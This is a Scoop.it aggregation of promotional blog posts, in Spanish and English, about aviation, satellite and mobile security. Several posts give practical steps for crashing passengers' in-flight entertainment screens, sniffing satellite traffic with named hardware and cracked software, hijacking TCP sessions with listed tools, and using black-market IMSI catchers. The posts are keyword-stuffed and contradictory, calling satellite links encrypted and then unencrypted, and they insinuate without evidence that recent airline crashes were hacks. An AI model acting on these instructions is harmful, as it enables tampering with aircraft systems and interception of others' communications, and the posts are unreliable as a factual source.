Uno de los escenario más común acuerdo con profesor del hacking ético Jorge Ríos que enfrentan las personas es cuando su sistema de entretenimiento en vuelo cuelga o se estrella. Algunos pasos que cualquiera persona puede seguir para estrellarse el sistema es seleccionando el canal de música para poner la música. Usted puede elegir cualquier canal de música, después de hacer eso, puede pulsar la opción de volumen para aumentar o disminuir el volumen. Esto resultará en una ventana emergente desde se puede ajustar el volumen. Después de poner el volumen al nivel que desee y no salir de la ventana de ajuste del volumen. Sólo tiene que pulsar el botón 'on / off'. Esto no va a apagar el sistema solo va dejar en negro la pantalla. Cuando encienda la pantalla después de un tiempo, verá la pantalla de control de volumen. Cuando le toque el botón Atrás, no pasará nada y el sistema se cuelga o se estrella.

Para reiniciar el sistema usted tiene que tomar la ayuda de asistente de vuelo, ya que tienen acceso a botones para reiniciar estos sistemas, pero este proceso puede tardar unos 30 minutos a una hora.Cualquier capacitación de seguridad informática debe enseñar cómo romper el sistema y cómo arreglar el sistema. Esta formación debe ser tomado por los desarrolladores, que desarrollan estos sistemas.

 

De acuerdo con nuestro experto de curso de hacking ético hay botón para reiniciar cerca del asiento de pasillo o debajo del asiento del pasillo que usted tendrá que activar para reiniciar su sistema para recuperarse.

Experto en capacitación de seguridad informática Anita Thomas dice que si la gente normal puede estrellarse el sistema o restablecer el sistema.Imagina lo que pueda hacer un hacker experto si los sistemas están conectados. En nuestro próximo artículo vamos a cubrir la investigaciones realizadas por otros hackers éticos en la industria y discutir más sobre la seguridad de comunicaciones por satélite. Mantenga siguiéndonos.

Fuente:http://www.iicybersecurity.com/reset-sistema-entretenimiento-avion.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Flight entertainment system in google images In-flight entertainment system hacks

Flight entertainment system in google images In-flight entertainment system hacks | Webimprints | Scoop.it
Blog about Ethical hacking in Airline Industry and In-flight Entertainment System Security in Mexico & US
David Thomas's insight:

In our last article over In-flight entertainment system security we discussed over functionalities that an In-flight entertainment system has and future technology that is being implemented in these system. We also discussed with ethical hacking course investigator Jorge Rios over security of these systems.

As we all know that these systems have really eased our journey in planes. However after the crash of Malaysian airlines and Air Asia airlines recently there have been security concerns of these systems that investigators are rising. As nobody is able to clearly figure out the reason behind these crashes, thus people have started thinking that it might be because of hack gone wrong. During our interview with information security training expert, Anita Thomas, she suggested that the risk of next generation In-flight entertainment system hack is high. Because the next generation system are connected so well that user can communicate on same channels as the planes. The most common scenarios you will find are of script kiddies testing in planes. In these scenarios they test how can a system like this be crashed. It like playing with your old calculator and after a while it shows an out of bound error. Ethical hacking course teacher Jorge Rios says that if some script kiddie can crash the system, what an expert could do. Some of the scenarios tested by people are through applications and games in these systems; the most common scenario is to test the games for boundary value analysis. Boundary value analysis is testing at the boundaries between partitions. You have to create valid and invalid boundaries that system can accept & reject as input.

In your in-flight entertainment system, first you find any game that allows you to input values etc. In this field you can try with random numbers to figure out the boundaries. During the information security training, the first step is; how to break the system and it is similar to this scenario. For example try the number 10 into that field, it might accept it or not. If it doesn’t accepts it means it can’t accept 2

digits number or more so your valid boundary must be 1 digit number. You might have to make assumption of digits between 0 and 9. You can start with number 5 and assuming you are lucky and it’s a boundary value. Means that input field will accept numbers up to 4. A classic programming mistake is to be off by 1 when coding constraints. For example, the programmer may have intended to code the statements: 0 <X< 5 And what actually got coded was 0 <X<= 5

You will now have the software behave as you expected at the illegal value 5. After finding this hit the + button which will increment the value to 6! Again, it can be a implementation problem, the increment constrain probably would say something like "if value = 4 do not increment." In this case, the value will not be 4 but 5 so it will be incremented it to 6. You can then continue to increment the field value by pressing the + button until you get to 127. Great things can happen when you add 1 to this value, namely that 127 + 1 = -128. As per our ethical hacking course expert at 127+1 the in-flight entertainment system will crash, either it will go black or reboot. Thus in this way you can do script kiddy like test and check how stable is the system. In our next article we will cover more of these kinds of hacks and discuss more about satellite communication security. Keep following us.

Source:http://www.iicybersecurity.com/in-flight-entertainment-system-hack.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Seguridad Cibernética industria aeronáutica Mexico US

En nuestra serie de artículos vamos a centrarnos en la seguridad de aerolíneas , seguridad en sistema de entretenimiento de avión y cómo puede un sistema de entretenimiento en vuelo puede ser hackeado y asegurada. Durante esta investigación un experto de hacking ético nos está ayudando desde instituto internacional de la seguridad cibernética para entender el sistema y cómo funciona todo.

 

¿Qué es un sistema de entretenimiento en vuelos? Entretenimiento en vuelo es un sistema que proporciona una experiencia maravillosa a los pasajeros, ayuda a las compañías aerolíneas para ganar ingresos, además ayuda a los pasajeros a pasar un tiempo de calidad durante su vuelo. Cada sistema de entretenimiento en vuelos tiene tecnologías de última generación como monitores, terminales y servidores, y softwares con gran interfaz para los usuario, como los juegos y aplicaciones. Estos sistemas dan una experiencia de nivel completamente nuevo a los pasajeros y les permiten conectarse a la televisión mundial; acceso a Internet y correo electrónico desde su asiento de avión 10,000 millas sobre la tierra. Pero, acuerdo con nuestro experto de Curso de Seguridad Informática Jorge Ríos, estas ventajas también traen varios riesgos de seguridad informática.

 

La mayoría de los sistemas de entretenimiento en vuelo utilizan la red de satélites de banda Ku para entregar el contenido, internet a las aeronaves. Esto permite al avión volando por todo el mundo para estar en contacto permanente con el satélite. Esto también permite a los pasajeros acceder a Internet, ver televisión en vivo e incluso llamar a su familia desde el avión.

 

Las aerolíneas están generando un ingreso adicional con estos sistemas mediante la entrega de la publicidad,con las compras en avión y servicio de cabina personalizada etc. Con estos sistemas también podemos gestionar la tripulación y las operaciones de las aplicaciones que pueden capturar los datos de operación y mantenimiento de avión en tiempo real. Esta funcionalidad permite el monitoreo de solución de in-flight entertainment and communications (IFEC). También permite a otros beneficios de operacionales tales como equipaje de viaje y monitoreo del clima en tiempo real, soporte de comunicación con tierra.

Como todos sabemos, la comunicación vía satélite es seguro y cifrado, por lo que estas comunicaciones también debe ser segura. Según nuestro profesor de hacking ético, Anita Thomas quien tiene un doctorado en seguridad cibernética, la comunicación vía satélite es seguro, ya que muchos de los hackers no tienen acceso directo a los sistemas de comunicación por satélite. Por lo tanto hay muy pocos hackers que tratan de romper el sistema. Se puede considerar igual a Windows y Mac, mucha gente tiene acceso a las windows por lo tanto hay gran cantidad de vulnerabilidades de seguridad y en Mac hay menos.

Algunos de los sistemas de entretenimiento en vuelo también permiten a los pasajeros utilizar sus teléfonos móviles, teléfonos inteligentes, como uno de los admitidos por AeroMobile. Esto no sólo permite a los pasajeros hacer y recibir llamadas telefónicas, enviar y leer mensajes de texto SMS o correo electrónico, servicios GPRS uso, navegar por la web, y mucho más. Y todo está conectado, el teléfono móvil con el sistemas de entretenimiento en vuelo. Esto suena maravilloso, pero también es muy atemorizante si ve con los ojos de un experto de Curso de Seguridad Informática Jorge Ríos.

Hay muchas cosas que estaremos cubriendo en nuestros próximos artículos sobre la seguridad cibernética en la industria de las aerolíneas y aeronaves, en particular. Mantenga siguiéndonos.

 Fuente:http://www.iicybersecurity.com/seguridad-sistema-entretenimiento-avion.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

El propósito de asegurar su DMZ

El propósito de asegurar su DMZ | Webimprints | Scoop.it
David Thomas's insight:

El propósito de curso seguridad informatica online es generalmente para permitir a los desarrolladores web para implementar seguridad en desarrollo de contenido Web desde sus PC hasta al servidor Web de producción. Un experto de pentesting explica que cuando existen estas conexiones, que son efectivamente las puertas traseras que permiten a los hackers informáticos acceder a los recursos de la red casi en su totalidad sin ser detectado-no detectados en la medida en que no están utilizando la ruta establecida por el router y en el firewall. Estas conexiones pueden ser descubiertos mediante el examen de las tablas de enrutamiento en los hosts dentro de la zona de dmz con ayuda de servicios de Hacking Ético.

Además, cuando estas conexiones se dejan en el lugar durante largos períodos de tiempo o de forma permanente, pueden ser identificados a través de barridos de ping y las trazas de ruta de la zona de distensión o un examen de la tabla ARP (AddressResolutionProtocol) es eso explican durante el curso seguridad informatica online.

 

En un caso de pentesting, la empresa, tenía una DMZ relativamente simple y directo, porque no había infraestructura Web a gran escala. Cuanto más complicada sea la infraestructura de la Web se convierte-que consiste en, por ejemplo, numerosos servidores Web que alojan una gran colección de aplicaciones basadas en la Web, cada uno se comunica con múltiples bases de datos-mayor será la probabilidad de identificar información útil sobre la red de destino o de encontrar una vulnerabilidad directa con ayuda de servicios de Hacking Ético.

 

Por lo tanto, debido a los intrusos a menudo pasan tiempo fuera de la carcasa DMZ antes de lanzar ataques contra otros recursos de la red, es esencial que los administradores de seguridad siguen un proceso similar para evaluar la instalación de DMZ de la empresa con el fin de determinar su postura de seguridad o tomar curso seguridad informatica online.

Durante el curso van a a prender sobre escaneo de puertos y como hacer pentesting. Durante escaneo de puertos el intruso se inica el reconocimiento con un

simple escaneo. La primera exploración es siempre sencillo, para no crear demasiado de una ruido, lo que podría desencadenar monitoreo de red y herramientas de detección de intrusos. Y, en cualquier caso, el primer paso es averiguar qué hosts están escuchando y pueden ser atacados en absoluto con ayuda de servicios de Hacking Ético y implementar seguridad en su red de la empresa.

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Seguridad de celulares,Seguridad de móviles, Hackear Celulares,Curso de Hacking de Móviles en México

Seguridad de celulares,Seguridad de móviles, Hackear Celulares,Curso de Hacking de Móviles en México | Webimprints | Scoop.it
Bienvenido a iicybersecurity.com! ofrecemos soluciones para protecion contra Hackear Celulares y da Curso de Hacking de Móviles en México,hacking de móvil
David Thomas's insight:

Porque Seguridad de móviles es tan importante en ese días cundo es muy fácil a hackear celulares, Apple ha desarrollado un proceso totalmente nuevo pago para reemplazar la billetera - Apple Pay. Tradicionalmente, los clientes tendrían que cavar en su bolso para buscar su billetera abultada, seleccione una tarjeta de crédito, mostrar su documento de identidad, y esperar a que la transacción se procesa para hacer una compra y eso es uno de los razones para seguridad de celulares.

El nuevo iPhone 6 y iPhone 6 Plus viene con funcionalidad NFC, lo que hace que los pagos móviles con Apple Pagar posible. Apple está probando esto con varios comerciantes en los EE.UU., y esto parece prometedor y puede convertirse en un fenómeno mundial en toda regla pero con NFC es mas fácil a hackear celulares.

Apple ha hecho un trabajo fantástico en centrarse en la experiencia del usuario y por lo que es muy fácil para los clientes la transición a los pagos móviles a través de Apple Pay pero hasta ahorita falta parte de Seguridad de móviles. Los clientes simplemente tomar una foto de su tarjeta de crédito de plástico corriente a través de su dispositivo, verificar su identidad en su banco, y se suman a Passbook.

Una vez que está ahí, los clientes simplemente hacer pagos en las tiendas a través de su dispositivo y Touch ID e incluso pagar por artículos en línea utilizando el mismo mecanismo. Para las transacciones de comercio electrónico, el proceso es sencillo: 1 toque la caja que está vinculada a la tarjeta de crédito de los clientes en una libreta de ahorros. Los clientes no tienen que introducir su número de tarjeta o la dirección, y no hay información de tarjeta de crédito es compartida con el comerciante. En caso que no hay seguridad de celulares alguien puede entrar y robar esa información de su celular.

Apple dice que también ha abordado cuestiones de Seguridad de móviles y privacidad con precisión pero expertos muestrearon que tan fácil es hackear celulares. Tarjetas de crédito en Passbook no muestran el número de cuenta. Cada transacción genera un número de pago 1 hora y código de seguridad dinámica, muy en contraste con los códigos estáticos CVC que vemos en las tarjetas de crédito de plástico. Las transacciones también se mantienen exclusivamente entre el consumidor, el comerciante y el banco - y sin ninguna intervención por parte de Apple pero hasta ahorita todos personas no creen que haya 100% seguridad de celulares.

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

HOW TO DEFINE INFORMATION SECURITY PLAN?

The information security plan describes how the security is implemented, defined policies, controls and solutions. The information security plan is developed considering all the IT resources depending on the security levels achieved and the pending aspects. An information security plan should focus on the actions required to achieve higher levels of security. It is very important to define the scope of an information security plan. According to logical security services company experts, the scope helps in defining priorities and actions depending on the IT resources. Physical security and logical security are two aspects of an information security plan and are necessary for implementing security in the companies. Below are the details of each aspect. LOGICAL SECURITY An important part of an information security plan is logical security. Logical security solutions with logical security controls form a path to implement logical security. LOGICAL SECURITY SOLUTIONS There are a great number of logical security solutions provided by various logical security services companies. Enterprise logical security solutions are required for the prevention, detection and recovery from a security breach. Logical security solutions and services avoid unauthorized access to company’s information. According to logical security services company’s expert, logical security control and network perimeter security systems are integral parts of logical security services. Logical security solutions and services create logical barriers that protect access to company’s information. As per the experience of logical security services company experts, traditionally enterprises relied on network perimeter security systems to defend against network threats and antivirus programs to defend against content threats. However, these systems do not provide complete protection against advance attacks. Logical security services company experts claim that the defense against sophisticated attacks is beyond the capacity of conventional logical security solutions and this has accelerated the need for logical security services and advanced solutions. PERIMETER SECURITY SYSTEMS An important part of the logical security solutions and services for companies is a perimeter security system. All companies, regardless of their size and the sector they are engaged in, currently have some form of perimeter security system for cyber defense against cyber attacks. Network Perimeter security systems are responsible for the security of the company’s IT resources against external threats such as viruses, worms, trojans, denial of service attacks, theft or destruction of data, and so on. Formerly network perimeter security systems only incorporated firewall, but the market for perimeter security system is changing a lot and in present moment a network perimeter security system even incorporates IDS (Intrusion Detection Systems) and IPS (Intrusion Prevention Systems). Perimeter security system specialist explains that a network perimeter security system should inspect application protocols, content and should use advanced techniques to identify unknown threats. Perimeter security systems provide protection at two different levels. The first level is the network; the network perimeter security system provides protection against threats like hackers, intrusions or theft of information in remote connections. The second level is the content; perimeter security system for content provides protection against threats such as malware, phishing, spam and inappropriate web content for companies. This clear division and the way in which threats are evolving in recent years has led to perimeter security system companies to focus on the development of dedicated teams for either end. IDENTIFICATION AND AUTHENTICATION OF USERS Identification and authentication of users is an important part of logical security solutions and services for companies. Access controls help in identification and authentication of users. The allocation of rights and privileges in an access control system are controlled through the authorization process which determines the profile of each user. Logical access controls solutions guarantee access to authorized users and prevent unauthorized access to IT resources. According to the experience of logical security controls experts, during the implementation of access control solutions companies should consider the following:  Logical security controls for classification, authorization and distribution of information.  The standards and company’s obligations regarding protection of information access.  Security audit processes to verify access controls.  Maintaining access records for each service or IT system.  The procedures for user identification and verification of access of each user.  Logical security controls should cover all phases of the lifecycle of user access, from the initial registration of new users to cancel the registration of users who do not require access to IT resources.  System and authentication method used by the access controls systems for information security.  Considering advance logical security solutions for access control, such as biometrics, smart cards, etc.  Define IT resources, which must be protected with the help of access control solutions. Authorization processes and methodology used by access controls system.According to logical security control experts, the review process of user access rights is very important after any change. Companies should implement network perimeter security solutions in order to prevent unauthorized modification, destruction and loss of data belonging to access control system. LOGICAL SECURITY CONTROLS The primary objective of logical security controls to provide guidance and help to the management, in accordance with business requirements and security standards. Logical security controls represent business goals and commitment to data security and should be communicated to all employees of the company. Logical security controls define the resources that must be protected and what are the logical security policies. Logical security controls themselves do not define how the IT resources are protected. This is defined through logical security services and logical security solutions. For each control there are several logical security solutions that may exist. Since logical security controls can affect all employees, it is important to make sure to have authorization for the implementation and development of the same. Logical security controls must be approved by logical security controls experts with experience in implementing logical security solutions and the management of the company that has the power to enforce them. Controls for incident management, data backup and protection of personal data form an integral part of logical security controls. PHYSICAL SECURITY SOLUTIONS Another important part of the information security plan is physical security. The physical security solutions are designed to achieve efficient management of security and these solutions must ensure compliance with the standards, as well as established by the company itself. The physical security solutions are intended to prevent unauthorized physical access, damage and interference to the IT infrastructure and company’s confidential information. Physical security solutions form an integral part of the information security solutions. IT departments and other departments which have data management can implement physical security solutions. The security plan identifies the areas controlled inside the company, the areas that have specific security requirements and on this basis; limited, restricted and strategic areas are declared and physical security solutions that apply to each area are described. Generally physical security solutions create a physical barrier around the areas of information processing. But some physical security solutions use multiple barriers to provide additional protection. Companies must periodically do the performance review of the solutions implemented and determine the actions required to achieve the business goals. The protection of the IT infrastructure and business devices form an integral part of physical security solutions and is needed to reduce the physical threats of unauthorized access to information and risks of theft or damage. These solutions must take into account the actions needed to fill gaps in security and for correcting errors. The physical security solutions ensure information protection against power failure, interception of information and protection of cables. According to experts of physical security solutions, physical threats and damages that may be caused by fires, floods, earthquakes, explosions, and other natural or man-made disaster should be considered during the implementation of physical security solutions in companies. Implementing a information security plan is an important step in the field of security as per experts from an organization specializing in logical security services for companies. The information security plan should adjust to the security system in place and manage security. The security plan should be very understandable and ensures compliance. The information security plan experts should assure that the security plan is updated based on the changes, new logical security controls and physical security solutions. Source:http://www.iicybersecurity.com/logical-security-solutions-services.html
more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Intercepción - ataques sobre comunicaciones satelital

Cómo interceptar - hacer ataques de hacking sobre comunicaciones satelital o señales satelital y seguridad de comunicaciones satelitales

David Thomas's insight:

En este artículo vamos a cubrir el ataque de hacking satelital que ha sido utilizado por grupos de hackers desde muchos años. Este ataque le proporcionará anonimato completo y así va a ser muy difícil por los expertos informática forense para rastrearle. En el último artículo hablamos acerca de la intercepción de tráfico por satélite y cubrimos los siguientes temas.

1. Configuración de antena parabólica.
2. Diferentes satélites y frecuencias correspondientes.
3. Diferentes programas para escanear frecuencias satelitales.
4. Formas de interceptar el tráfico satelital.
5. Cómo tener conexión a internet por satélite, televisión gratis y ataques básicos de piratería/hacking.

Con la ayuda de un software como DVB Snoop y Wireshark podemos interceptar las comunicaciones por satélite y tomar una descarga de datos, como comunicación no está cifrada explica Mike Stevens experto de hacking ético y empresa de seguridad informática. Después de seguir los pasos mencionados en el artículo anterior, vamos a configurar antena parabólica apuntando al satélite específico que emite el tráfico. Como sabemos que los paquetes no están cifrados, utilizaremos DVB-Snoop junto a Wireshark para interceptar el tráfico. Una vez que se identificamos una dirección IP de satélite que ruta a través del enlace descendente del satélite, podemos empezar a interceptar los paquetes de Internet a esta IP específica. Para interceptar los paquetes, podemos hacer ataque de secuestro TCP fácilmente revela experto de empresa de auditoría informática. 

¿Qué es el ataque de secuestro TCP satelital?
Protocolo de Control de Transmisión (TCP) es un protocolo muy importante de la capa de transporte. TCP es un protocolo orientado a la conexión, lo que significa una conexión que se hace y se mantiene hasta que los programas de aplicación en cada extremo hayan terminado la comunicación. Este protocolo determina cómo dividir los datos de la aplicación en paquetes que la red puede entregar. También se comunica con la capa de red y gestiona el control de flujo. El protocolo TCP divide los datos en paquetes, los numera y luego los envía de forma individual a la capa de IP para la entrega. También gestiona la retransmisión y el reconocimiento de los paquetes según expertos de empresa de seguridad informática. En el modelo de comunicación Open Systems Interconnection (OSI), TCP cubre partes de la capa 4, la capa de transporte, partes de la Capa 5 y la capa de sesión. TCP procesa paquetes por número de secuencia y pone los paquetes fuera de orden en sus lugares. El protocolo TCP es el único protocolo de la familia de protocolos TCP/IP que soporta los mecanismos de paquetes adicionales, identificación de la conexión y la autenticación. Eso explica por qué los protocolos de nivel de aplicación, tales como SMTP, FTP, etc. utilizan TCP para obtener acceso remoto a otras máquinas. Para la definición de los paquetes, la cabecera TCP consta de dos campos de 32 bits que se utilizan como contadores de paquetes. Se denominan número de secuencia y reconocimiento. Otro campo, llamado Bit de Control, es 6 bits de largo, y lleva los siguientes indicadores de comando y es muy importante entender esos indicadores para hacer auditoría informática:

URG: Indicador de Urgencia
ACK: Indicador de Reconocimiento
PSH: Indicador de Empuje
RST: Indicador para Restablecer 
SYN: Indicador para sincronizar los números de secuencia
FIN: Indicador, cuando no hay más datos del remitente

Durante el ataque secuestro TCP el hacker se hace cargo de sesión de comunicación entre los diferentes usuarios haciéndose pasar por el usuario autorizado. Una vez que se ha accedido a detalles de la sesión del usuario, el hacker pueda enmascararse como el usuario y hacer cualquier cosa que el usuario está autorizado a hacer en la red. 

Métodos de secuestro TCP satelital
Existen diferentes métodos de secuestro TCP satelital explica Dave Taylor experto de informática forense y algunos de ellos son:

IP Spoofing (Falsificación de IP)
IP spoofing es una técnica utilizada para obtener acceso no autorizado de la comunicación, donde los mensajes se envían por el secuestrador a un ordenador con una dirección IP de un host de confianza. Cuando el secuestrador ha suplantado con éxito una dirección IP, él / ella determina el siguiente número de secuencia que el satélite espera e inyecta el paquete RST con el mismo en la sesión TCP antes de que el cliente puede responder. Así crea un estado no sincronizado. Los números de secuencia y ACK ya no están sincronizados entre cliente y satélite y el secuestrador aprovecha de esta situación para establecer la conexión como usuario de confianza explica experto de empresa de auditoría informática.

Blind Hijacking (Secuestro Ciego)
Cuando el enrutamiento de origen está desactivado y secuestrador no puede ver la respuesta del satélite. El secuestrador utiliza secuestro ciego donde el secuestrador inyecta sus datos maliciosos en comunicaciones interceptadas en una sesión TCP. Así, la palabra "ciegos" porque el secuestrador puede enviar los datos o comandos, pero no puede ver la respuesta. El secuestrador, básicamente,adivina las respuestas del cliente y el satélite.

Man in the Middle (MiTM) (Interceptar Paquetes)
Esta técnica implica el uso de un analizador de paquetes (sniffer) para interceptar la comunicación entre el cliente y el satélite. Todos los datos entre los hosts fluyen a través de sniffer del secuestrador y él es libre de modificar el contenido de los paquetes. Esta técnica significa que los paquetes sean enviados a través de host del secuestrador señala experto de empresa de auditoría informática.
Por el secuestro de comunicación satelital los hackers normalmente utilizan combinación de man in middle y ataque de IP spoofing. Una comunicación normal TCP tiene un apretón de manos de 3 vías usando paquete SYN de usuario por satélite, luego SYN + ACK del satélite al usuario y, por último ACK del usuario al satélite. Durante un ataque de secuestro TCP, el hacker intercepta la comunicación y envía un paquete RST para el usuario y se inicia la comunicación con el satélite con la dirección IP falsificada del usuario.

Como hacer Secuestro TCP Satelital 
Puede utilizar las siguientes herramientas para hacer TCP Secuestro Satelital:

Hunt
Hunt (distribución binaria de Linux) es un programa para entrometerse en una conexión TCP, revisarlo y reiniciarlo señala experto de empresa de seguridad informática.
1) Con Hunt, podemos hacer la gestión de conexiones y detectar una conexión permanente. Hunt permite secuestro activo con la detección de ACK, ARP spoof y la sincronización del cliente con el satélite después de secuestro.
2) Con Hunt, podemos reiniciar el daemon para restablecimiento de conexión automática y actuar como relay de daemon para ARP spoof. Permite buscar información en el tráfico y la recolección de direcciones MAC.
3) Hunt actúa como programa para resolver host DNS y el motor de paquetes extensible para la observación de TCP, UDP, ICMP y el tráfico ARP. 

Shijack
Shijack es una herramienta de secuestro de conexiones TCP para Linux, FreeBSD y Solaris. La herramienta requiere Libnet. Es un código de fuente abierta y se puede utilizar para tomar el control de la sesión TCP.

Scapy
Scapy es una poderosa herramienta de manipulación de paquetes interactivo escrito en Python, y la mejor parte es que también pueda ser utilizada como una biblioteca en programas Python, que proporciona la pentester la capacidad de crear su propia herramienta basada en la exigencia. Scapy nos permite interceptar crear, enviar y paquetes rebanada modificados para hacking y el análisis de informática forense.

Juggernaut
Juggernaut es básicamente un sniffer de red, que también puede ser utilizado para secuestrar sesiones TCP. Se ejecuta en Linux y tiene un módulo Trinux también. Juggernaut puede ser activado para ver todo el tráfico de red en la red local, o se pueda configurar para escuchar un "token" especial. De esta manera, esta herramienta puede ser utilizada para capturar ciertos tipos de tráfico y puede funcionar durante unos días, y luego el atacante sólo tiene que recoger el archivo de registro que contiene el tráfico registrado.

En el próximo artículo vamos a cubrir más sobre ataques de hacking más avanzados que involucran satélites, también pueden aprender durante curso avanzado de hacking ético de International Institute of Cyber Security. Este artículo es sólo con fines educativos.

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Intercept Hack Satellite Communication

Blog sobre Hacking ético industria aeronáutica y Seguridad en sistema de entretenimiento en avión Mexico US.
David Thomas's insight:

In today world we use satellite communication in many respects and industries and we all know how important they are in our lives. There different kinds of satellites depending upon the distance from the earth and others depending upon their orbits. Circular and elliptical orbital are two kinds of orbital satellites.
Also satellites are classified based on their height above Earth’s surface. The kinds of satellites are 
1. Low-Earth orbits (LEO)– These satellites are in range of 180 kilometers to 2,000 kilometers above Earth. Most of these satellites are for military purposes and for collecting weather data.
2. Medium-Earth orbits (MEO)– These satellites are in range of 2,000 kilometers to 36,000 kilometers. Navigation satellites are of this kind.
3. Geosynchronous orbits (GEO)– GEO satellites, also known as geostationary satellites, are in range greater than 36,000 kilometers. Television and communication satellites are of this kind.
Satellites used for television or communication signals are generally in either elliptical orbit or geostationary orbit. Most of these satellites uses DVB standard for transmission.
The DVB Project is an Alliance of 200 worldwide companies. Digital video broadcasting is been used worldwide to deliver multimedia content and television. DVB standard has been adopted by all the countries and is the benchmark for digital television worldwide. The DVB-S, DVB-C system is used across the world. Around 1 Billion DVB receivers are used worldwide. DVB is not encrypted and is broadcast so anybody can receive the signal if you have the right tools and knowledge. Since 2002 lot of people have been using technique to download digital content from satellites for free. Below are the steps for intercepting satellite communications as per Mike Stevens, Professor of satellite ethical hacking training at International Institute of Cyber Security.

STEP 1( HARDWARE)
To sniff the Satellite broadcast you will need a Satellite dish with Low Noise Block down converter (LNB). The bigger the dish the better the range of signal it can pick. The cost of good satellite dish can vary from 50 USD to 300 USD and are very easily available. 
The size of the antenna depends upon the satellite you wish to sniff; you would like to just sniff one particular satellite then a small dish of 75cm will also do. This you can easily find out by searching over the Internet or you can visit the website of satellite company.
You can get details about the satellite you want to intercept from Internet; for example the below are details of some of the satellites in Latin America. 
As per expert from International Institute of Cyber Security, Mike Stevens you can use Internet to find the Polarization Setting (LNB Skew), Elevation, Azimuth for your Antenna dish placement according to your satellite and location.

STEP 2 (INTERFACE)
The next thing you need is a DVB Tuner card (DVB-S/S2 tuner card). A DVB tuner card is a kind of card that allows satellite signals to be received by a computer. Most DVB tuners also function as video and multimedia content capture cards, allowing them to record satellite content onto a hard disk. The cards come in PCI Express (PCIe), PCMCIA, ExpressCard, or USB devices standards. The tuner card is easily available in market and cost around 100 USD. Different brands of cards that work smoothly are DVBWorld, TBS/QBOX, Azureware, TechniSat, TechnoTrend, Genitech, and TeVii. As per ethical hacking experts most commonly used card is Technisat skystar 2. You can install these cards as normal PCI cards or in USB form and their installation is very easy. 

STEP 3 (FEED HUNTING)
Now you will need a Feed scanner software (Feed hunting) so that you can do automatic scanning and streamreader.dll , it’s basically the protocol driver that turns streams into readable data such as binary and ASCII files “Videos, documents, pages, torrents, iso files”. There are many free software available online. Some of the scanning softwares are CrazyScan, Easy Blind Scan. With this software you can do Blind Scan and Auto Scan. 

STEP 4 (SATELLITE FISHING)
You will need sniffing software depending on what your end motive is. These softwares allow offline downloading of data, live streaming of Radio and video, satellite internet and intercepting signals. Some of these softwares are :

1. SkyGrabber
SkyGrabber is software that is used to tune a satellite dish for the best reception of satellite internet service or television programming. The software has the scanner mentioned in step 3 and gives the option to select a satellite from a dropdown list. Virtually all the world’s regional satellite networks appear in that list, arranged by longitude. If your satellite provider is not listed, you can manually add the provider through a New Provider dialog. As soon as you’ve chosen a satellite, it shows various signal quality configurations that, that you can use to point the satellite antenna en correct direction as covered in step 2. You can set file filters to download particular type of data.
You can even watch television programs through the card at the same time as using the software to download content. This software is priced around 40 USD Euros and belongs to Russian company. However most people used cracked version of this software which is more easily available.

2. Skynet
Software similar to Skygrabber but in this we have to configure PID for specific transponders. This list is available in Internet.

3. Fishnet
This software is free but its mostly used in Middle East and it is for DSL frequencies for downloading DSL related data.

4. DVBDream
Streaming software for Windows 

5. PROG DVB
Streaming software, also available for Android. 

6. ALTDVB
Streaming software. 

7. TSReader
TSReader is a transport stream analyzer, decoder, recorder and stream manipulator for MPEG-2 systems.

8. DVBSNOOP
Dvbsnoop is a DVB / MPEG stream analyzer program, which enables you to watch (live) stream information in human readable form. Its purpose is to debug, dump or view digital stream information (e.g. digital television broadcasts) sent via satellite, cable or terrestrial. You can use DVBSnoop kind of software with wireshark for data analysis purposes. And can be used for advance hacking attacks.

In next article we will cover more about satellite encryption and hacking attacks involving satellites with the help of telecommunications ethical hacking expert, Dan Morris. This article is only for educational purposes.

Source:http://www.iicybersecurity.com/intercept-satellite-communications.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Interceptar comunicaciones celulares

Blog sobre Hacking ético industria aeronáutica y Seguridad en sistema de entretenimiento en avión Mexico US.
David Thomas's insight:

Monitoreo de los teléfonos celulares sin su conocimiento está creciendo rápidamente en los países de América Latina como Argentina, México y Brasil después de ser muy famoso en Estados Unidos desde 2008.
El interceptor GSM/ Stingray / Receptor de IMSI es un equipo que puede recopilar datos de cientos de teléfonos en zonas específicas y también puede realizar ataques de denegación de servicio a los teléfonos móviles e interceptar conversaciones de gente. Aunque estos productos no están disponibles legalmente, pero se pueden comprar a través de los mercados negros o través de Deep Web.
La policía y fuerza militar utilizan estos dispositivos para rastrear teléfonos celulares. Un sistema de Stingray tiene una antena, mapas, y un dispositivo de señal. El dispositivo trabaja como una torre celular de Base Transmitting Stations (BTS) y obtiene la lista de los teléfonos en la zona conectados con BTS. Luego se recoge International Mobile Subscriber Number (IMSI) y Electronic Serial Number (ESM) asociados con todos los teléfonos en su rango.
Hay dos maneras de utilizar estos dispositivos, dice Mike Stevens, experto de capacitación de hacking ético de móviles del Instituto Internacional de Seguridad Cibernética.
Una forma es utilizar la antena en un área determinada para recoger International Mobile Subscriber Number (IMSI) y Electronic Serial Number (ESN) de los teléfonos móviles en esa zona y ver quién está en esa zona pre-determinada.
La segunda manera es localizar un teléfono móvil con IMEI, International Mobile Subscriber Number (IMSI) y Electronic Serial Number (ESN) como aplicación de Find my phone de teléfonos de Apple, pero en este caso, podemos rastrear el teléfono incluso si se formatea el teléfono, como IMEI está asociado con el hardware no el software. En base a la intensidad de la señal del dispositivo se puede encontrar la ubicación exacta del teléfono móvil.
También en algunos casos un ataque DOS se puede hacer sobre el teléfono móvil, pero en términos de señal de GSM no en términos de los paquetes de datos. Cuando esta bajo de ataca de DOS el teléfono no puede recibir o realizar llamadas.
Con el software se pueden utilizar estos dispositivos para interceptar las conversaciones de los teléfonos móviles y hacer llamadas y mandar SMS falsos. Estos software están conocidos como Over-The-Air special signal software como FISHHAWK, PORPOISE.
